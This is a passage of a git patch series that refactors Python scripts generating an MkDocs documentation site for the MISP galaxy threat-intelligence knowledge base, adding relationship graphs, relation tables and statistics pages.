self.galaxies[galaxy_name].add_cluster(uuid=uuid, description=description, value=value, meta=meta) + + def define_relationship(self, cluster_a_id, cluster_b_id): + cluster_a = None + cluster_b = None + + # Search for Cluster A and Cluster B in all galaxies + for galaxy in self.galaxies.values(): + if cluster_a_id in galaxy.clusters: + cluster_a = galaxy.clusters[cluster_a_id] + if cluster_b_id in galaxy.clusters: + cluster_b = galaxy.clusters[cluster_b_id] + if cluster_a and cluster_b: # Both clusters found + break + + # If both clusters are found, define the relationship + if cluster_a and cluster_b: + cluster_a.add_outbound_relationship(cluster_b) + cluster_b.add_inbound_relationship(cluster_a) + else: + # If Cluster B is not found, create a private cluster relationship for Cluster A + if cluster_a: + private_cluster = Cluster(uuid=cluster_b_id, galaxy=None) + cluster_a.add_outbound_relationship(private_cluster) + else: + print("Cluster A not found in any galaxy") + + # def get_relationships_with_levels(self, galaxy, cluster): + # start_galaxy = self.galaxies[galaxy] + # start_cluster = start_galaxy.clusters[cluster] + + # def bfs_with_inbound_outbound(start_cluster): + # visited = set() # To keep track of visited clusters + # linked = set() # To keep track of linked clusters + # queue = deque([(start_cluster, 0, 'outbound')]) # Include direction of relationship + # relationships = [] + + # while queue: + # current_cluster, level, direction = queue.popleft() + # if (current_cluster, direction) not in visited: # Check visited with direction + # visited.add((current_cluster, direction)) + + # # Process outbound relationships + # if direction == 'outbound': + # for to_cluster in current_cluster.outbound_relationships: + # if (to_cluster, 'outbound') not in visited: + # # relationships.append((current_cluster, to_cluster, level + 1, 'outbound')) + # queue.append((to_cluster, level + 1, 'outbound')) + # relationships.append((current_cluster, to_cluster, level + 1, 'outbound')) + + + # # Process inbound relationships + # for from_cluster in current_cluster.inbound_relationships: + # if (from_cluster, 'inbound') not in visited: + # relationships.append((from_cluster, current_cluster, level + 1, 'inbound')) + # queue.append((from_cluster, level + 1, 'inbound')) + + # return relationships + + + # return bfs_with_inbound_outbound(start_cluster) + + # def get_relationships_with_levels(self, galaxy, cluster): + # start_galaxy = self.galaxies[galaxy] + # start_cluster = start_galaxy.clusters[cluster] + + # def bfs_with_inbound_outbound(start_cluster): + # visited = set() # To keep track of visited clusters + # relationships = defaultdict(lambda: (float('inf'), '')) # Store lowest level for each link + + # queue = deque([(start_cluster, 0, 'outbound')]) # Include direction of relationship + + # while queue: + # print(f"Queue: {[c.uuid for c, l, d in queue]}") + # current_cluster, level, direction = queue.popleft() + # if (current_cluster, direction) not in visited: # Check visited with direction + # visited.add((current_cluster, direction)) + + # if current_cluster.uuid == "a5a067c9-c4d7-4f33-8e6f-01b903f89908": + # print(f"Current cluster: {current_cluster.uuid}, Level: {level}, Direction: {direction}") + # print(f"outbound relationships: {[x.uuid for x in current_cluster.outbound_relationships]}") + + + # # Process outbound relationships + # if direction == 'outbound': + # for to_cluster in current_cluster.outbound_relationships: + # if (to_cluster, 'outbound') not in visited: + # queue.append((to_cluster, level + 1, 'outbound')) + + # link = frozenset([current_cluster, to_cluster]) + # if relationships[link][0] > level + 1: + # relationships[link] = (level + 1, 'outbound') + + # # Process inbound relationships + # for from_cluster in current_cluster.inbound_relationships: + # if (from_cluster, 'inbound') not in visited: + # queue.append((from_cluster, level + 1, 'inbound')) + + # link = frozenset([from_cluster, current_cluster]) + # if relationships[link][0] > level + 1: + # relationships[link] = (level + 1, 'inbound') + + # # Convert defaultdict to list of tuples for compatibility with your existing structure + # processed_relationships = [] + # for link, (lvl, dir) in relationships.items(): + # clusters = list(link) + # if dir == 'outbound': + # processed_relationships.append((clusters[0], clusters[1], lvl, dir)) + # else: + # processed_relationships.append((clusters[1], clusters[0], lvl, dir)) + + # return processed_relationships + + # return bfs_with_inbound_outbound(start_cluster) + + def get_relationships_with_levels(self, start_cluster): + + def bfs_with_undirected_relationships(start_cluster): + visited = set() # Tracks whether a cluster has been visited + relationships = defaultdict(lambda: float('inf')) # Tracks the lowest level for each cluster pair + + queue = deque([(start_cluster, 0)]) # Queue of (cluster, level) + + while queue: + current_cluster, level = queue.popleft() + if current_cluster not in visited: + visited.add(current_cluster) + + # Process all relationships regardless of direction + neighbors = current_cluster.outbound_relationships.union(current_cluster.inbound_relationships) + for neighbor in neighbors: + link = frozenset([current_cluster, neighbor]) + if level + 1 < relationships[link]: + relationships[link] = level + 1 + if neighbor not in visited: + queue.append((neighbor, level + 1)) + + # Convert the defaultdict to a list of tuples, ignoring direction + processed_relationships = [] + for link, lvl in relationships.items(): + # Extract clusters from the frozenset; direction is irrelevant + clusters = list(link) + + # Arbitrarily choose the first cluster as 'source' for consistency + try: + processed_relationships.append((clusters[0], clusters[1], lvl)) + except: + processed_relationships.append((clusters[0], Cluster(uuid=0, galaxy=None), lvl)) + + return processed_relationships + + return bfs_with_undirected_relationships(start_cluster) \ No newline at end of file From 9a0fca647bd3760d18590e2b0d3b2f63de78b78e Mon Sep 17 00:00:00 2001 From: niclas Date: Mon, 4 Mar 2024 14:39:41 +0100 Subject: [PATCH 29/49] Fix [tool] file creation --- tools/mkdocs/main.py | 62 ++++++++-------- tools/mkdocs/modules/galaxy.py | 7 +- tools/mkdocs/modules/universe.py | 118 ++++++------------------------- 3 files changed, 54 insertions(+), 133 deletions(-) diff --git a/tools/mkdocs/main.py b/tools/mkdocs/main.py index 0697ef3..897cf58 100644 --- a/tools/mkdocs/main.py +++ b/tools/mkdocs/main.py @@ -15,15 +15,13 @@ CLUSTER_PATH = "../../clusters" SITE_PATH = "./site/docs" GALAXY_PATH = "../../galaxies" -def save_cluster_relationships(cluster_data): +def get_cluster_relationships(cluster_data): # Unpack cluster data - galaxy_name, cluster_name, cluster = cluster_data + galaxy, cluster = cluster_data + relationships = universe.get_relationships_with_levels(universe.galaxies[galaxy].clusters[cluster]) - # Assuming `universe.get_relationships_with_levels` and `cluster.save_relationships` - # are methods that can be called like this. - relationships = universe.get_relationships_with_levels(cluster) - cluster.save_relationships(relationships) - print(f"Processed {galaxy_name}, {cluster_name}") + print(f"Processed {galaxy}, {cluster}") + return cluster, galaxy, relationships def get_deprecated_galaxy_files(): deprecated_galaxy_files = [] @@ -46,24 +44,30 @@ def cluster_transform_to_link(cluster): .replace(":", "") .replace(placeholder, "-") ) - return f"[{cluster.value} ({cluster.uuid})](../../{cluster.galaxy.json_file_name}/index.md#{section})" + galaxy_folder = cluster.galaxy.json_file_name.replace(".json", "") + return f"[{cluster.value} ({cluster.uuid})](../../{galaxy_folder}/index.md#{section})" def galaxy_transform_to_link(galaxy): - return f"[{galaxy.galaxy_name}](../../{galaxy.json_file_name}/index.md)" + galaxy_folder = galaxy.json_file_name.replace(".json", "") + return f"[{galaxy.galaxy_name}](../../{galaxy_folder}/index.md)" def generate_relations_table(relationships): markdown = "|Cluster A | Galaxy A | Cluster B | Galaxy B | Level { .graph } |\n" - markdown += "|--- | --- | --- | --- | --- | ---|\n" + markdown += "| --- | --- | --- | --- | --- |\n" for from_cluster, to_cluster, level in relationships: - from_galaxy = from_cluster.galaxy.galaxy_name - to_galaxy = to_cluster.galaxy.galaxy_name - markdown += f"{cluster_transform_to_link(from_cluster)} | {galaxy_transform_to_link(from_galaxy)} | {cluster_transform_to_link(to_cluster)} | {galaxy_transform_to_link(to_galaxy)} | {level}\n" + from_galaxy = from_cluster.galaxy + if to_cluster.value != "Private Cluster": + to_galaxy = to_cluster.galaxy + markdown += f"{cluster_transform_to_link(from_cluster)} | {galaxy_transform_to_link(from_galaxy)} | {cluster_transform_to_link(to_cluster)} | {galaxy_transform_to_link(to_galaxy)} | {level}\n" + else: + markdown += f"{cluster_transform_to_link(from_cluster)} | {galaxy_transform_to_link(from_galaxy)} | {to_cluster.value} | Unknown | {level}\n" return markdown def generate_index_page(galaxies): index_output = "# MISP Galaxy\n\nThe MISP galaxy offers a streamlined approach for representing large entities, known as clusters, which can be linked to MISP events or attributes. Each cluster consists of one or more elements, represented as key-value pairs. MISP galaxy comes with a default knowledge base, encompassing areas like Threat Actors, Tools, Ransomware, and ATT&CK matrices. However, users have the flexibility to modify, update, replace, or share these elements according to their needs.\n\nClusters and vocabularies within MISP galaxy can be utilized in their original form or as a foundational knowledge base. The distribution settings for each cluster can be adjusted, allowing for either restricted or wide dissemination.\n\nAdditionally, MISP galaxies enable the representation of existing standards like the MITRE ATT&CK™ framework, as well as custom matrices.\n\nThe aim is to provide a core set of clusters for organizations embarking on analysis, which can be further tailored to include localized, private information or additional, shareable data.\n\nClusters serve as an open and freely accessible knowledge base, which can be utilized and expanded within [MISP](https://www.misp-project.org/) or other threat intelligence platforms.\n\n![Overview of the integration of MISP galaxy in the MISP Threat Intelligence Sharing Platform](https://raw.githubusercontent.com/MISP/misp-galaxy/aa41337fd78946a60aef3783f58f337d2342430a/doc/images/galaxy.png)\n\n## Publicly available clusters\n" for galaxy in galaxies: - index_output += f"- [{galaxy.galaxy_name}](./{galaxy.json_file_name}/index.md)\n" + galaxy_folder = galaxy.json_file_name.replace(".json", "") + index_output += f"- [{galaxy.galaxy_name}](./{galaxy_folder}/index.md)\n" index_output += "## Statistics\n\nYou can find some statistics about MISP galaxies [here](./statistics.md).\n" index_output += "# Contributing\n\nIn the dynamic realm of threat intelligence, a variety of models and approaches exist to systematically organize, categorize, and delineate threat actors, hazards, or activity groups. We embrace innovative methodologies for articulating threat intelligence. The galaxy model is particularly versatile, enabling you to leverage and integrate methodologies that you trust and are already utilizing within your organization or community.\n\nWe encourage collaboration and contributions to the [MISP Galaxy JSON files](https://github.com/MISP/misp-galaxy/). Feel free to fork the project, enhance existing elements or clusters, or introduce new ones. Your insights are valuable - share them with us through a pull-request.\n" return index_output @@ -93,7 +97,6 @@ if __name__ == "__main__": meta=cluster.get("meta", None) ) - # Define the relationships between clusters for galaxy in galaxies_fnames: with open(os.path.join(CLUSTER_PATH, galaxy)) as fr: @@ -102,20 +105,18 @@ if __name__ == "__main__": if "related" in cluster: for related in cluster["related"]: universe.define_relationship(cluster["uuid"], related["dest-uuid"]) - - - # # Save relationships to clusters - # for galaxy in universe.galaxies.values(): - # for cluster in galaxy.clusters.values(): - # cluster.save_relationships(universe.get_relationships_with_levels(cluster)) tasks = [] for galaxy_name, galaxy in universe.galaxies.items(): for cluster_name, cluster in galaxy.clusters.items(): - tasks.append((galaxy_name, cluster_name, cluster)) + tasks.append((galaxy_name, cluster_name)) with Pool(processes=multiprocessing.cpu_count()) as pool: - pool.map(save_cluster_relationships, tasks) + result = pool.map(get_cluster_relationships, tasks) + + for cluster, galaxy, relationships in result: + universe.galaxies[galaxy].clusters[cluster].relationships = relationships + print("All clusters processed.") print(f"Finished relations in {time.time() - start_time} seconds") @@ -131,9 +132,10 @@ if __name__ == "__main__": galaxy.write_entry(SITE_PATH) for galaxy in universe.galaxies.values(): - if not os.path.exists(GALAXY_PATH): - os.mkdir(GALAXY_PATH) - relation_path = os.path.join(GALAXY_PATH, "relations") + galaxy_path = os.path.join(SITE_PATH, f"{galaxy.json_file_name}".replace(".json", "")) + if not os.path.exists(galaxy_path): + os.mkdir(galaxy_path) + relation_path = os.path.join(galaxy_path, "relations") if not os.path.exists(relation_path): os.mkdir(relation_path) with open(os.path.join(relation_path, ".pages"), "w") as index: @@ -141,14 +143,8 @@ if __name__ == "__main__": for cluster in galaxy.clusters.values(): if cluster.relationships: + print(f"Writing {cluster.uuid}.md") with open(os.path.join(relation_path, f"{cluster.uuid}.md"), "w") as index: index.write(generate_relations_table(cluster.relationships)) print(f"Finished in {time.time() - start_time} seconds") - - # relationships = universe.get_relationships_with_levels("Banker", "f0ec2df5-2e38-4df3-970d-525352006f2e") - # print(relationships) - - - # markdown_table = generate_markdown_table(relationships) - # print(markdown_table) \ No newline at end of file diff --git a/tools/mkdocs/modules/galaxy.py b/tools/mkdocs/modules/galaxy.py index 7fd5785..997ac9d 100644 --- a/tools/mkdocs/modules/galaxy.py +++ b/tools/mkdocs/modules/galaxy.py @@ -16,9 +16,10 @@ class Galaxy: self.clusters[uuid] = Cluster(uuid=uuid, galaxy=self, description=description, value=value, meta=meta) def write_entry(self, path): - if not os.path.exists(path): - os.mkdir(path) - with open(os.path.join(path, f"{self.galaxy_name}.md"), "w") as index: + galaxy_path = os.path.join(path, f"{self.json_file_name}".replace(".json", "")) + if not os.path.exists(galaxy_path): + os.mkdir(galaxy_path) + with open(os.path.join(galaxy_path, "index.md"), "w") as index: index.write(self.generate_entry()) def generate_entry(self): diff --git a/tools/mkdocs/modules/universe.py b/tools/mkdocs/modules/universe.py index f443629..6e1607a 100644 --- a/tools/mkdocs/modules/universe.py +++ b/tools/mkdocs/modules/universe.py @@ -5,8 +5,9 @@ from collections import defaultdict, deque class Universe: - def __init__(self): + def __init__(self, add_inbound_relationship=False): self.galaxies = {} # Maps galaxy_name to Galaxy objects + self.add_inbound_relationship = add_inbound_relationship def add_galaxy(self, galaxy_name, json_file_name, authors, description): if galaxy_name not in self.galaxies: @@ -36,98 +37,10 @@ class Universe: else: # If Cluster B is not found, create a private cluster relationship for Cluster A if cluster_a: - private_cluster = Cluster(uuid=cluster_b_id, galaxy=None) + private_cluster = Cluster(uuid=cluster_b_id, galaxy=None, description=None, value="Private Cluster", meta=None) cluster_a.add_outbound_relationship(private_cluster) else: - print("Cluster A not found in any galaxy") - - # def get_relationships_with_levels(self, galaxy, cluster): - # start_galaxy = self.galaxies[galaxy] - # start_cluster = start_galaxy.clusters[cluster] - - # def bfs_with_inbound_outbound(start_cluster): - # visited = set() # To keep track of visited clusters - # linked = set() # To keep track of linked clusters - # queue = deque([(start_cluster, 0, 'outbound')]) # Include direction of relationship - # relationships = [] - - # while queue: - # current_cluster, level, direction = queue.popleft() - # if (current_cluster, direction) not in visited: # Check visited with direction - # visited.add((current_cluster, direction)) - - # # Process outbound relationships - # if direction == 'outbound': - # for to_cluster in current_cluster.outbound_relationships: - # if (to_cluster, 'outbound') not in visited: - # # relationships.append((current_cluster, to_cluster, level + 1, 'outbound')) - # queue.append((to_cluster, level + 1, 'outbound')) - # relationships.append((current_cluster, to_cluster, level + 1, 'outbound')) - - - # # Process inbound relationships - # for from_cluster in current_cluster.inbound_relationships: - # if (from_cluster, 'inbound') not in visited: - # relationships.append((from_cluster, current_cluster, level + 1, 'inbound')) - # queue.append((from_cluster, level + 1, 'inbound')) - - # return relationships - - - # return bfs_with_inbound_outbound(start_cluster) - - # def get_relationships_with_levels(self, galaxy, cluster): - # start_galaxy = self.galaxies[galaxy] - # start_cluster = start_galaxy.clusters[cluster] - - # def bfs_with_inbound_outbound(start_cluster): - # visited = set() # To keep track of visited clusters - # relationships = defaultdict(lambda: (float('inf'), '')) # Store lowest level for each link - - # queue = deque([(start_cluster, 0, 'outbound')]) # Include direction of relationship - - # while queue: - # print(f"Queue: {[c.uuid for c, l, d in queue]}") - # current_cluster, level, direction = queue.popleft() - # if (current_cluster, direction) not in visited: # Check visited with direction - # visited.add((current_cluster, direction)) - - # if current_cluster.uuid == "a5a067c9-c4d7-4f33-8e6f-01b903f89908": - # print(f"Current cluster: {current_cluster.uuid}, Level: {level}, Direction: {direction}") - # print(f"outbound relationships: {[x.uuid for x in current_cluster.outbound_relationships]}") - - - # # Process outbound relationships - # if direction == 'outbound': - # for to_cluster in current_cluster.outbound_relationships: - # if (to_cluster, 'outbound') not in visited: - # queue.append((to_cluster, level + 1, 'outbound')) - - # link = frozenset([current_cluster, to_cluster]) - # if relationships[link][0] > level + 1: - # relationships[link] = (level + 1, 'outbound') - - # # Process inbound relationships - # for from_cluster in current_cluster.inbound_relationships: - # if (from_cluster, 'inbound') not in visited: - # queue.append((from_cluster, level + 1, 'inbound')) - - # link = frozenset([from_cluster, current_cluster]) - # if relationships[link][0] > level + 1: - # relationships[link] = (level + 1, 'inbound') - - # # Convert defaultdict to list of tuples for compatibility with your existing structure - # processed_relationships = [] - # for link, (lvl, dir) in relationships.items(): - # clusters = list(link) - # if dir == 'outbound': - # processed_relationships.append((clusters[0], clusters[1], lvl, dir)) - # else: - # processed_relationships.append((clusters[1], clusters[0], lvl, dir)) - - # return processed_relationships - - # return bfs_with_inbound_outbound(start_cluster) + raise ValueError(f"Cluster {cluster_a} not found in any galaxy") def get_relationships_with_levels(self, start_cluster): @@ -143,26 +56,37 @@ class Universe: visited.add(current_cluster) # Process all relationships regardless of direction - neighbors = current_cluster.outbound_relationships.union(current_cluster.inbound_relationships) + if self.add_inbound_relationship: + neighbors = current_cluster.outbound_relationships.union(current_cluster.inbound_relationships) + else: + neighbors = current_cluster.outbound_relationships for neighbor in neighbors: link = frozenset([current_cluster, neighbor]) if level + 1 < relationships[link]: relationships[link] = level + 1 - if neighbor not in visited: + if neighbor not in visited and neighbor.value != "Private Cluster": queue.append((neighbor, level + 1)) - + + # count = 0 # Convert the defaultdict to a list of tuples, ignoring direction processed_relationships = [] for link, lvl in relationships.items(): # Extract clusters from the frozenset; direction is irrelevant clusters = list(link) + if len(clusters) != 2: + # count += 1 + continue # Arbitrarily choose the first cluster as 'source' for consistency - try: + if clusters[0].value == "Private Cluster": + processed_relationships.append((clusters[1], clusters[0], lvl)) + else: + processed_relationships.append((clusters[0], clusters[1], lvl)) - except: - processed_relationships.append((clusters[0], Cluster(uuid=0, galaxy=None), lvl)) + # except: + # processed_relationships.append((clusters[0], clusters[0], lvl)) # This is wrong just for testing!!! + # print(f"Count: {count}") return processed_relationships return bfs_with_undirected_relationships(start_cluster) \ No newline at end of file From 94e0b855d110ac2a000e3b871c289a173b8816f9 Mon Sep 17 00:00:00 2001 From: niclas Date: Mon, 4 Mar 2024 16:29:39 +0100 Subject: [PATCH 30/49] Add [tool] statistics --- tools/mkdocs/generator.py | 191 +++++++++++++++++-------------- tools/mkdocs/main.py | 150 ------------------------ tools/mkdocs/modules/site.py | 81 +++++++++++++ tools/mkdocs/modules/universe.py | 14 +-- tools/mkdocs/utils/helper.py | 20 +++- 5 files changed, 210 insertions(+), 246 deletions(-) delete mode 100644 tools/mkdocs/main.py create mode 100644 tools/mkdocs/modules/site.py diff --git a/tools/mkdocs/generator.py b/tools/mkdocs/generator.py index 6f87abf..0b3342c 100644 --- a/tools/mkdocs/generator.py +++ b/tools/mkdocs/generator.py @@ -1,68 +1,26 @@ -#!/usr/bin/python +from modules.universe import Universe +from modules.site import IndexSite, StatisticsSite -from modules.galaxy import Galaxy -from modules.statistics import Statistics +import multiprocessing +from multiprocessing import Pool import json import os import time +import sys +sys.setrecursionlimit(10000) + +FILES_TO_IGNORE = [] CLUSTER_PATH = "../../clusters" SITE_PATH = "./site/docs" GALAXY_PATH = "../../galaxies" - -FILES_TO_IGNORE = [] # if you want to skip a specific cluster in the generation - - -INTRO = """ -# MISP Galaxy - -The MISP galaxy offers a streamlined approach for representing large entities, known as clusters, which can be linked to MISP events or attributes. Each cluster consists of one or more elements, represented as key-value pairs. MISP galaxy comes with a default knowledge base, encompassing areas like Threat Actors, Tools, Ransomware, and ATT&CK matrices. However, users have the flexibility to modify, update, replace, or share these elements according to their needs. - -Clusters and vocabularies within MISP galaxy can be utilized in their original form or as a foundational knowledge base. The distribution settings for each cluster can be adjusted, allowing for either restricted or wide dissemination. - -Additionally, MISP galaxies enable the representation of existing standards like the MITRE ATT&CK™ framework, as well as custom matrices. - -The aim is to provide a core set of clusters for organizations embarking on analysis, which can be further tailored to include localized, private information or additional, shareable data. - -Clusters serve as an open and freely accessible knowledge base, which can be utilized and expanded within [MISP](https://www.misp-project.org/) or other threat intelligence platforms. - -![Overview of the integration of MISP galaxy in the MISP Threat Intelligence Sharing Platform](https://raw.githubusercontent.com/MISP/misp-galaxy/aa41337fd78946a60aef3783f58f337d2342430a/doc/images/galaxy.png) - -## Publicly available clusters - -""" - -STATISTICS = """ -## Statistics - -You can find some statistics about MISP galaxies [here](./statistics.md). - -""" - -CONTRIBUTING = """ - -# Contributing - -In the dynamic realm of threat intelligence, a variety of models and approaches exist to systematically organize, categorize, and delineate threat actors, hazards, or activity groups. We embrace innovative methodologies for articulating threat intelligence. The galaxy model is particularly versatile, enabling you to leverage and integrate methodologies that you trust and are already utilizing within your organization or community. - -We encourage collaboration and contributions to the [MISP Galaxy JSON files](https://github.com/MISP/misp-galaxy/). Feel free to fork the project, enhance existing elements or clusters, or introduce new ones. Your insights are valuable - share them with us through a pull-request. - -""" - -def write_galaxy_entry(galaxy, site_path, cluster_dict): - galaxy.write_entry(site_path, cluster_dict) - return f"Finished writing entry for {galaxy.name}" - -def create_index(galaxies): - index_output = INTRO - for galaxy in galaxies: - index_output += f"- [{galaxy.name}](./{galaxy.json_file_name}/index.md)\n" - index_output += STATISTICS - index_output += CONTRIBUTING - return index_output - +def get_cluster_relationships(cluster_data): + galaxy, cluster = cluster_data + relationships = universe.get_relationships_with_levels(universe.galaxies[galaxy].clusters[cluster]) + print(f"Processed {galaxy}, {cluster}") + return cluster, galaxy, relationships def get_deprecated_galaxy_files(): deprecated_galaxy_files = [] @@ -74,9 +32,39 @@ def get_deprecated_galaxy_files(): return deprecated_galaxy_files +def cluster_transform_to_link(cluster): + placeholder = "__TMP__" + section = ( + cluster + .value.lower() + .replace(" - ", placeholder) # Replace " - " first + .replace(" ", "-") + .replace("/", "") + .replace(":", "") + .replace(placeholder, "-") + ) + galaxy_folder = cluster.galaxy.json_file_name.replace(".json", "") + return f"[{cluster.value} ({cluster.uuid})](../../{galaxy_folder}/index.md#{section})" -def main(): +def galaxy_transform_to_link(galaxy): + galaxy_folder = galaxy.json_file_name.replace(".json", "") + return f"[{galaxy.galaxy_name}](../../{galaxy_folder}/index.md)" + +def generate_relations_table(relationships): + markdown = "|Cluster A | Galaxy A | Cluster B | Galaxy B | Level { .graph } |\n" + markdown += "| --- | --- | --- | --- | --- |\n" + for from_cluster, to_cluster, level in relationships: + from_galaxy = from_cluster.galaxy + if to_cluster.value != "Private Cluster": + to_galaxy = to_cluster.galaxy + markdown += f"{cluster_transform_to_link(from_cluster)} | {galaxy_transform_to_link(from_galaxy)} | {cluster_transform_to_link(to_cluster)} | {galaxy_transform_to_link(to_galaxy)} | {level}\n" + else: + markdown += f"{cluster_transform_to_link(from_cluster)} | {galaxy_transform_to_link(from_galaxy)} | {to_cluster.value} | Unknown | {level}\n" + return markdown + +if __name__ == "__main__": start_time = time.time() + universe = Universe() FILES_TO_IGNORE.extend(get_deprecated_galaxy_files()) galaxies_fnames = [] @@ -85,45 +73,78 @@ def main(): galaxies_fnames.append(f) galaxies_fnames.sort() - galaxies = [] + # Create the universe of clusters and galaxies for galaxy in galaxies_fnames: with open(os.path.join(CLUSTER_PATH, galaxy)) as fr: galaxy_json = json.load(fr) - galaxies.append( - Galaxy( - cluster_list=galaxy_json["values"], - authors=galaxy_json["authors"], - description=galaxy_json["description"], - name=galaxy_json["name"], - json_file_name=galaxy.split(".")[0], - ) + universe.add_galaxy(galaxy_name=galaxy_json["name"], json_file_name=galaxy, authors=galaxy_json["authors"], description=galaxy_json["description"]) + for cluster in galaxy_json["values"]: + universe.add_cluster( + galaxy_name=galaxy_json.get("name", None), + uuid=cluster.get("uuid", None), + description=cluster.get("description", None), + value=cluster.get("value", None), + meta=cluster.get("meta", None) ) - cluster_dict = {} - for galaxy in galaxies: - for cluster in galaxy.clusters: - cluster_dict[cluster.uuid] = cluster - statistics = Statistics(cluster_dict=cluster_dict) - for galaxy in galaxies: - for cluster in galaxy.clusters: - statistics.add_cluster(cluster) + # Define the relationships between clusters + for galaxy in galaxies_fnames: + with open(os.path.join(CLUSTER_PATH, galaxy)) as fr: + galaxy_json = json.load(fr) + for cluster in galaxy_json["values"]: + if "related" in cluster: + for related in cluster["related"]: + universe.define_relationship(cluster["uuid"], related["dest-uuid"]) - # Write files + tasks = [] + for galaxy_name, galaxy in universe.galaxies.items(): + for cluster_name, cluster in galaxy.clusters.items(): + tasks.append((galaxy_name, cluster_name)) + + with Pool(processes=multiprocessing.cpu_count()) as pool: + result = pool.map(get_cluster_relationships, tasks) + + for cluster, galaxy, relationships in result: + universe.galaxies[galaxy].clusters[cluster].relationships = relationships + + print("All clusters processed.") + + print(f"Finished relations in {time.time() - start_time} seconds") + + # Write output if not os.path.exists(SITE_PATH): os.mkdir(SITE_PATH) + + index = IndexSite(SITE_PATH) + index.add_content("# MISP Galaxy\n\nThe MISP galaxy offers a streamlined approach for representing large entities, known as clusters, which can be linked to MISP events or attributes. Each cluster consists of one or more elements, represented as key-value pairs. MISP galaxy comes with a default knowledge base, encompassing areas like Threat Actors, Tools, Ransomware, and ATT&CK matrices. However, users have the flexibility to modify, update, replace, or share these elements according to their needs.\n\nClusters and vocabularies within MISP galaxy can be utilized in their original form or as a foundational knowledge base. The distribution settings for each cluster can be adjusted, allowing for either restricted or wide dissemination.\n\nAdditionally, MISP galaxies enable the representation of existing standards like the MITRE ATT&CK™ framework, as well as custom matrices.\n\nThe aim is to provide a core set of clusters for organizations embarking on analysis, which can be further tailored to include localized, private information or additional, shareable data.\n\nClusters serve as an open and freely accessible knowledge base, which can be utilized and expanded within [MISP](https://www.misp-project.org/) or other threat intelligence platforms.\n\n![Overview of the integration of MISP galaxy in the MISP Threat Intelligence Sharing Platform](https://raw.githubusercontent.com/MISP/misp-galaxy/aa41337fd78946a60aef3783f58f337d2342430a/doc/images/galaxy.png)\n\n## Publicly available clusters\n") + index.add_toc(universe.galaxies.values()) + index.add_content("## Statistics\n\nYou can find some statistics about MISP galaxies [here](./statistics.md).\n\n") + index.add_content("# Contributing\n\nIn the dynamic realm of threat intelligence, a variety of models and approaches exist to systematically organize, categorize, and delineate threat actors, hazards, or activity groups. We embrace innovative methodologies for articulating threat intelligence. The galaxy model is particularly versatile, enabling you to leverage and integrate methodologies that you trust and are already utilizing within your organization or community.\n\nWe encourage collaboration and contributions to the [MISP Galaxy JSON files](https://github.com/MISP/misp-galaxy/). Feel free to fork the project, enhance existing elements or clusters, or introduce new ones. Your insights are valuable - share them with us through a pull-request.\n") + index.write_entry() - for galaxy in galaxies: - galaxy.write_entry(SITE_PATH, cluster_dict) + statistics = StatisticsSite(SITE_PATH) + statistics.add_galaxy_statistics(universe.galaxies.values()) + statistics.add_cluster_statistics([cluster for galaxy in universe.galaxies.values() for cluster in galaxy.clusters.values()]) + statistics.add_relation_statistics([cluster for galaxy in universe.galaxies.values() for cluster in galaxy.clusters.values()]) + statistics.write_entry() - index_output = create_index(galaxies) + for galaxy in universe.galaxies.values(): + galaxy.write_entry(SITE_PATH) - statistics.write_entry(SITE_PATH) + for galaxy in universe.galaxies.values(): + galaxy_path = os.path.join(SITE_PATH, f"{galaxy.json_file_name}".replace(".json", "")) + if not os.path.exists(galaxy_path): + os.mkdir(galaxy_path) + relation_path = os.path.join(galaxy_path, "relations") + if not os.path.exists(relation_path): + os.mkdir(relation_path) + with open(os.path.join(relation_path, ".pages"), "w") as index: + index.write(f"hide: true\n") - with open(os.path.join(SITE_PATH, "index.md"), "w") as index: - index.write(index_output) + for cluster in galaxy.clusters.values(): + if cluster.relationships: + print(f"Writing {cluster.uuid}.md") + with open(os.path.join(relation_path, f"{cluster.uuid}.md"), "w") as index: + index.write(generate_relations_table(cluster.relationships)) - print(f"Finished file creation in {time.time() - start_time} seconds") - - -if __name__ == "__main__": - main() + print(f"Finished in {time.time() - start_time} seconds") diff --git a/tools/mkdocs/main.py b/tools/mkdocs/main.py deleted file mode 100644 index 897cf58..0000000 --- a/tools/mkdocs/main.py +++ /dev/null @@ -1,150 +0,0 @@ -from modules.universe import Universe - -import multiprocessing -from multiprocessing import Pool - -import json -import os -import time -import sys - -sys.setrecursionlimit(10000) - -FILES_TO_IGNORE = [] -CLUSTER_PATH = "../../clusters" -SITE_PATH = "./site/docs" -GALAXY_PATH = "../../galaxies" - -def get_cluster_relationships(cluster_data): - # Unpack cluster data - galaxy, cluster = cluster_data - relationships = universe.get_relationships_with_levels(universe.galaxies[galaxy].clusters[cluster]) - - print(f"Processed {galaxy}, {cluster}") - return cluster, galaxy, relationships - -def get_deprecated_galaxy_files(): - deprecated_galaxy_files = [] - for f in os.listdir(GALAXY_PATH): - with open(os.path.join(GALAXY_PATH, f)) as fr: - galaxy_json = json.load(fr) - if "namespace" in galaxy_json and galaxy_json["namespace"] == "deprecated": - deprecated_galaxy_files.append(f) - - return deprecated_galaxy_files - -def cluster_transform_to_link(cluster): - placeholder = "__TMP__" - section = ( - cluster - .value.lower() - .replace(" - ", placeholder) # Replace " - " first - .replace(" ", "-") - .replace("/", "") - .replace(":", "") - .replace(placeholder, "-") - ) - galaxy_folder = cluster.galaxy.json_file_name.replace(".json", "") - return f"[{cluster.value} ({cluster.uuid})](../../{galaxy_folder}/index.md#{section})" - -def galaxy_transform_to_link(galaxy): - galaxy_folder = galaxy.json_file_name.replace(".json", "") - return f"[{galaxy.galaxy_name}](../../{galaxy_folder}/index.md)" - -def generate_relations_table(relationships): - markdown = "|Cluster A | Galaxy A | Cluster B | Galaxy B | Level { .graph } |\n" - markdown += "| --- | --- | --- | --- | --- |\n" - for from_cluster, to_cluster, level in relationships: - from_galaxy = from_cluster.galaxy - if to_cluster.value != "Private Cluster": - to_galaxy = to_cluster.galaxy - markdown += f"{cluster_transform_to_link(from_cluster)} | {galaxy_transform_to_link(from_galaxy)} | {cluster_transform_to_link(to_cluster)} | {galaxy_transform_to_link(to_galaxy)} | {level}\n" - else: - markdown += f"{cluster_transform_to_link(from_cluster)} | {galaxy_transform_to_link(from_galaxy)} | {to_cluster.value} | Unknown | {level}\n" - return markdown - -def generate_index_page(galaxies): - index_output = "# MISP Galaxy\n\nThe MISP galaxy offers a streamlined approach for representing large entities, known as clusters, which can be linked to MISP events or attributes. Each cluster consists of one or more elements, represented as key-value pairs. MISP galaxy comes with a default knowledge base, encompassing areas like Threat Actors, Tools, Ransomware, and ATT&CK matrices. However, users have the flexibility to modify, update, replace, or share these elements according to their needs.\n\nClusters and vocabularies within 